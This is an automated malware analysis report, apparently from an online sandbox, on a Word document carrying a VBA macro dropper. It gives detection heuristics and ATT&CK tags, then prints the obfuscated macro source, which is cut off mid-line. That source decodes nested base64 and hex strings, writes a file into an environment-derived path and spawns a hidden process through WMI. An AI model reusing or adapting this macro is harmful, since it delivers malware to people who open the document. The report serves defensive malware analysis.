MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. Heuristics indicate the use of CreateObject and GetObject, common for malware execution. The ClamAV detection 'Doc.Dropper.Agent-6840332-0' strongly suggests a dropper functionality. The VBA code appears to be obfuscated and attempts to decode a string, likely for a download URL or execution command, which is then used to fetch and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6840332-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6840332-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5438 bytes |
SHA-256: 56f97f50f1ff353b9f2ae55d7947989f3d1d0283f7c5bd969cb718bb4c58f87f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Frame1, 0, 0, MSForms, Frame"
Attribute VB_Control = "Kplkaz, 1, 1, MSForms, Label"
Const qruvnsndep = 2
Const roynjvqzwr = 1
Const yeworzuolv = 0
Function adrjxyejashlspphmtdb(ByVal cshdchsb)
Const Nbxjok = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi" & "jklmnopqrstuvwxyz0123456789+/"
Dim fezijdJdxH, sOut, fpwkzLM
cshdchsb = Replace(cshdchsb, vbCrLf, "")
cshdchsb = Replace(cshdchsb, vbTab, "")
cshdchsb = Replace(cshdchsb, " ", "")
fezijdJdxH = Len(cshdchsb)
If fezijdJdxH Mod 4 <> 0 Then
Err.Raise roynjvqzwr, rlpkngnvtcar("4261736536344465636f64") & rlpkngnvtcar("65"), rlpkngnvtcar("426164") & rlpkngnvtcar("2042617365363420737472696e672e")
Exit Function
End If
For fpwkzLM = 1 To fezijdJdxH Step 4
Dim UEIkxhedu, SNWKndzue, DHWOcjizez, wuzkdJSslo, pzoskNksz, auspeudNzL
UEIkxhedu = 3
pzoskNksz = 0
For SNWKndzue = 0 To 3
DHWOcjizez = Mid(cshdchsb, fpwkzLM + SNWKndzue, roynjvqzwr)
If DHWOcjizez = rlpkngnvtcar("3d") Then
UEIkxhedu = UEIkxhedu - 1
wuzkdJSslo = 0
Else
wuzkdJSslo = InStr(roynjvqzwr, Nbxjok, DHWOcjizez, vbBinaryCompare) - 1
End If
If wuzkdJSslo = -1 Then
Err.Raise qruvnsndep, rlpkngnvtcar("4261") & rlpkngnvtcar("736536344465636f6465"), rlpkngnvtcar("4261642063686172616374657220496e20") & rlpkngnvtcar("42617365363420737472696e672e")
Exit Function
End If
pzoskNksz = 64 * pzoskNksz + wuzkdJSslo
Next
pzoskNksz = Hex(pzoskNksz)
pzoskNksz = String(6 - Len(pzoskNksz), rlpkngnvtcar("30")) & pzoskNksz
auspeudNzL = Chr(CByte(rlpkngnvtcar("2648") & Mid(pzoskNksz, roynjvqzwr, qruvnsndep))) + _
Chr(CByte(rlpkngnvtcar("2648") & Mid(pzoskNksz, 3, qruvnsndep))) + _
Chr(CByte(rlpkngnvtcar("2648") & Mid(pzoskNksz, 5, qruvnsndep)))
sOut = sOut & Left(auspeudNzL, UEIkxhedu)
Next
adrjxyejashlspphmtdb = sOut
End Function
Sub Frame1_Layout()
aYceLzaRWBzdRqDWb = "nwRNUstboFexLUHbd"
YTKJWDTRZtkXa = Array(20, 15, 20)
GAvuEHVfQysLEj = 1187024257
Call dnecnzdfkscoqkuzbprj
AeqRGHLlmVhwHBoKd = "zKtiNQWmONiZjV"
ctXVLbUCmpVfT = "LuQcBfcRfGJmZIWbU"
OPPrxGHgqouNQe = 1914037291
VhdjxdXMbJYoLx = 2068248205
End Sub
Sub dnecnzdfkscoqkuzbprj()
Const DKPP_NU = 0
sfsnisvklweghpsa = rlpkngnvtcar("2e")
Set xzsgawvtfxgywzero = GetObject(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5a444a7364574a585a48526b53453032") & rlpkngnvtcar("57455a3350513d3d"))) & sfsnisvklweghpsa & adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5745684b646d497a556d4e5a4d6d78305a4770") & rlpkngnvtcar("4a50513d3d"))))
bsxsunwliuss = Environ(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5a45645764474e425054") & rlpkngnvtcar("303d")))) & adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("5745645765574e744f58") & rlpkngnvtcar("6c6a655456705756685250513d3d")))
dytnzuxutll = adrjxyejashlspphmtdb(Kplkaz & Okszo & Pklirop)
aGfxRShgJvuIiyTQf = 36
oiKVesAQrMBKVTi = "JXiQbVRsuPZLU"
Set umrdusymgbinrkftb = CreateObject(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("56") & rlpkngnvtcar("544a4f65574659516a4268567a56755447746163474a48566c526c57453477576c637855466c746347785a4d314539"))))
Dim xkrzosmvcwqgjemf As Object
Set xkrzosmvcwqgjemf = umrdusymgbinrkftb.CreateTextFile(bsxsunwliuss)
xkrzosmvcwqgjemf.WriteLine dytnzuxutll
OarmHjHpdHCvL = "sgmhzEeJkAZjWtG"
jqotZFrXtxieQimo = 1900470925
xkrzosmvcwqgjemf.Close
Set hvcjhbccksmkz = xzsgawvtfxgywzero.Get(adrjxyejashlspphmtdb(adrjxyejashlspphmtdb(rlpkngnvtcar("566a4a7364553136536d5a56534570325754") & rlpkngnvtcar("4a57656d4d78546a425a57456f775a46684250513d3d"))))
Set daovfqgvlvkrlipxijho = hvcjhbccksmkz.SpawnInstance_
geCrMKOADRPpQZ = "eZGrSeXDuHjVFvy"
whQCjggoliwSV = "IabvKkbGjPicZMYr"
YGqLtrvPMriXTUsG = 815423797
ILeQuXWajoJEzSyd = 1683081379
daovfqgvlvkrlipxijho.ShowWindow = DKPP_NU
Set qixdymojrzprxaidiahz = GetObject(adrjxyejashlspphmtd
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.